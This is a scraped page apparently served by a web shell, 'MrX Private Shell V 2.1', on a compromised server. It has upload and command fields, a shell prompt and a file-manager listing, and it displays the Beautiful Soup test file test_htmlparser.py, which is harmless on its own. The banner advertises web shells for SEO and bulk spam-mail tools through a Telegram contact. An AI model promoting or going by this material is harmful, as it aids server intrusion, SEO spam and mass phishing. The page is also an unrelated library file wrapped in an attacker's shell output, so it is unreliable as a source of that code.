__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
"""Tests to ensure that the html.parser tree builder generates good
trees."""

import pickle
import pytest
from bs4.builder._htmlparser import (
    _DuplicateAttributeHandler,
    BeautifulSoupHTMLParser,
    HTMLParserTreeBuilder,
)
from bs4.exceptions import ParserRejectedMarkup
from typing import Any
from . import HTMLTreeBuilderSmokeTest


class TestHTMLParserTreeBuilder(HTMLTreeBuilderSmokeTest):
    """Checks specific to the html.parser tree builder.

    Inherits from HTMLTreeBuilderSmokeTest and uses
    HTMLParserTreeBuilder as the builder under test.
    """

    default_builder = HTMLParserTreeBuilder

    def test_rejected_input(self):
        # Python's html.parser sometimes refuses markup outright, most
        # often because of a problem in the initial DOCTYPE
        # declaration. The way it complains varies between Python
        # versions, but Beautiful Soup is expected to surface every
        # such failure as a ParserRejectedMarkup exception.
        rejected_documents = (
            # https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=28873
            # https://github.com/guidovranken/python-library-fuzzers/blob/master/corp-html/519e5b4269a01185a0d5e76295251921da2f0700
            # https://github.com/python/cpython/issues/81928
            b"\n<![\xff\xfe\xfe\xcd\x00",
            # https://github.com/guidovranken/python-library-fuzzers/blob/master/corp-html/de32aa55785be29bbc72a1a8e06b00611fb3d9f8
            # https://github.com/python/cpython/issues/78661
            #
            b"<![n\x00",
            b"<![UNKNOWN[]]>",
        )
        for document in rejected_documents:
            with pytest.raises(ParserRejectedMarkup):
                self.soup(document)

    def test_namespaced_system_doctype(self):
        """Deliberately empty: html.parser can't handle namespaced
        doctypes, so this test is skipped."""

    def test_namespaced_public_doctype(self):
        """Deliberately empty: html.parser can't handle namespaced
        doctypes, so this test is skipped."""

    def test_builder_is_pickled(self):
        """Unlike most tree builders, HTMLParserTreeBuilder can be
        pickled and will be restored after unpickling.
        """
        original = self.soup("<a><b>foo</a>")
        # Round-trip through pickle protocol 2.
        restored = pickle.loads(pickle.dumps(original, 2))
        assert isinstance(restored.builder, type(original.builder))

    def test_redundant_empty_element_closing_tags(self):
        # Each pair is (markup to parse, expected serialization).
        cases = (
            ("<br></br><br></br><br></br>", "<br/><br/><br/>"),
            ("</br></br></br>", ""),
        )
        for markup, expected in cases:
            self.assert_soup(markup, expected)

    def test_empty_element(self):
        # Makes sure that data still sitting in the parser's buffer
        # when parsing ends is not lost.
        markup = "foo &# bar"
        expected = "foo &amp;# bar"
        self.assert_soup(markup, expected)

    def test_tracking_line_numbers(self):
        """Each tag records the line number and position where it was
        found, unless that feature is switched off."""
        markup = "\n   <p>\n\n<sourceline>\n<b>text</b></sourceline><sourcepos></p>"

        # Default behavior: the location is stored on the tag.
        soup = self.soup(markup)
        paragraph = soup.p
        assert paragraph.sourceline == 2
        assert paragraph.sourcepos == 3
        # A tag literally named "sourceline" can still be located
        # with find().
        assert paragraph.find("sourceline").name == "sourceline"

        # Passing store_line_numbers=False turns the tracking off.
        soup = self.soup(markup, store_line_numbers=False)
        paragraph = soup.p
        assert paragraph.sourceline is None
        assert paragraph.sourcepos is None

    def test_on_duplicate_attribute(self):
        """A tag that repeats an attribute can be handled in several
        ways, selected through on_duplicate_attribute."""
        markup = '<a class="cls" href="url1" href="url2" href="url3" id="id">'

        # With no on_duplicate_attribute argument at all, the last
        # value seen for the attribute wins.
        anchor = self.soup(markup).a
        assert anchor["href"] == "url3"
        assert anchor["class"] == ["cls"]
        assert anchor["id"] == "id"

        def check_href(
            on_duplicate_attribute: _DuplicateAttributeHandler, expected: Any
        ) -> None:
            # Parse the markup with the given strategy and compare the
            # resulting href against the expected value.
            parsed = self.soup(markup, on_duplicate_attribute=on_duplicate_attribute)
            assert parsed.a is not None
            tag = parsed.a
            assert tag["href"] == expected

            # Attributes that appear only once must be unaffected.
            assert tag["class"] == ["cls"]
            assert tag["id"] == "id"

        # A callable strategy: gather every value into a list.
        def accumulate(attrs, key, value):
            current = attrs[key]
            if isinstance(current, list):
                current.append(value)
            else:
                attrs[key] = [current, value]

        strategies = (
            # "Last value wins" can also be requested explicitly.
            (None, "url3"),
            (BeautifulSoupHTMLParser.REPLACE, "url3"),
            # Keep the first value and ignore the later ones.
            (BeautifulSoupHTMLParser.IGNORE, "url1"),
            # Delegate to the callable defined above.
            (accumulate, ["url1", "url2", "url3"]),
        )
        for strategy, expected_href in strategies:
            check_href(strategy, expected_href)

    def test_html5_attributes(self):
        # Any entity named in the HTML5 spec is turned into the
        # matching Unicode characters on the way in, and those
        # characters are turned back into a named entity (not
        # necessarily the same one) on the way out.
        #
        # Each row: (entity in the markup, parsed Unicode text,
        # bytes produced by the "html" formatter).
        entity_table = (
            ("&RightArrowLeftArrow;", "\u21c4", b"&rlarr;"),
            ("&models;", "\u22a7", b"&models;"),
            ("&Nfr;", "\U0001d511", b"&Nfr;"),
            ("&ngeqq;", "\u2267\u0338", b"&ngeqq;"),
            ("&not;", "\xac", b"&not;"),
            ("&Not;", "\u2aec", b"&Not;"),
            ("&quot;", '"', b'"'),
            ("&there4;", "\u2234", b"&there4;"),
            ("&Therefore;", "\u2234", b"&there4;"),
            ("&therefore;", "\u2234", b"&there4;"),
            ("&fjlig;", "fj", b"fj"),
            ("&sqcup;", "\u2294", b"&sqcup;"),
            ("&sqcups;", "\u2294\ufe00", b"&sqcups;"),
            ("&apos;", "'", b"'"),
            ("&verbar;", "|", b"|"),
        )
        for entity, text, html_bytes in entity_table:
            div = self.soup("<div>%s</div>" % entity).div

            # Default encoding: the raw characters, UTF-8 encoded.
            raw_output = div.encode()
            assert raw_output == b"<div>%s</div>" % text.encode("utf8")

            # "html" formatter: characters become named entities again.
            entity_output = div.encode(formatter="html")
            assert entity_output == b"<div>%s</div>" % html_bytes

    def test_invalid_html_entity(self):
        # The html.parser tree builder cannot tell an unknown entity
        # that ends in a semicolon from one that does not, so both
        # spellings produce the same output.
        expected = "<p>a &amp;nosuchentity b</p>"
        for markup in (
            "<p>a &nosuchentity b</p>",
            "<p>a &nosuchentity; b</p>",
        ):
            soup = self.soup(markup)
            assert soup.p.decode() == expected

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
fuzz Folder 0755
__init__.py File 51.04 KB 0644
test_builder.py File 1.07 KB 0644
test_builder_registry.py File 4.95 KB 0644
test_css.py File 18.19 KB 0644
test_dammit.py File 17.42 KB 0644
test_element.py File 4.27 KB 0644
test_filter.py File 26.4 KB 0644
test_formatter.py File 6.78 KB 0644
test_fuzz.py File 6.96 KB 0644
test_html5lib.py File 8.99 KB 0644
test_htmlparser.py File 6.51 KB 0644
test_lxml.py File 7.28 KB 0644
test_navigablestring.py File 4.98 KB 0644
test_pageelement.py File 15.82 KB 0644
test_soup.py File 22.14 KB 0644
test_tag.py File 9.46 KB 0644
test_tree.py File 53.55 KB 0644
Filemanager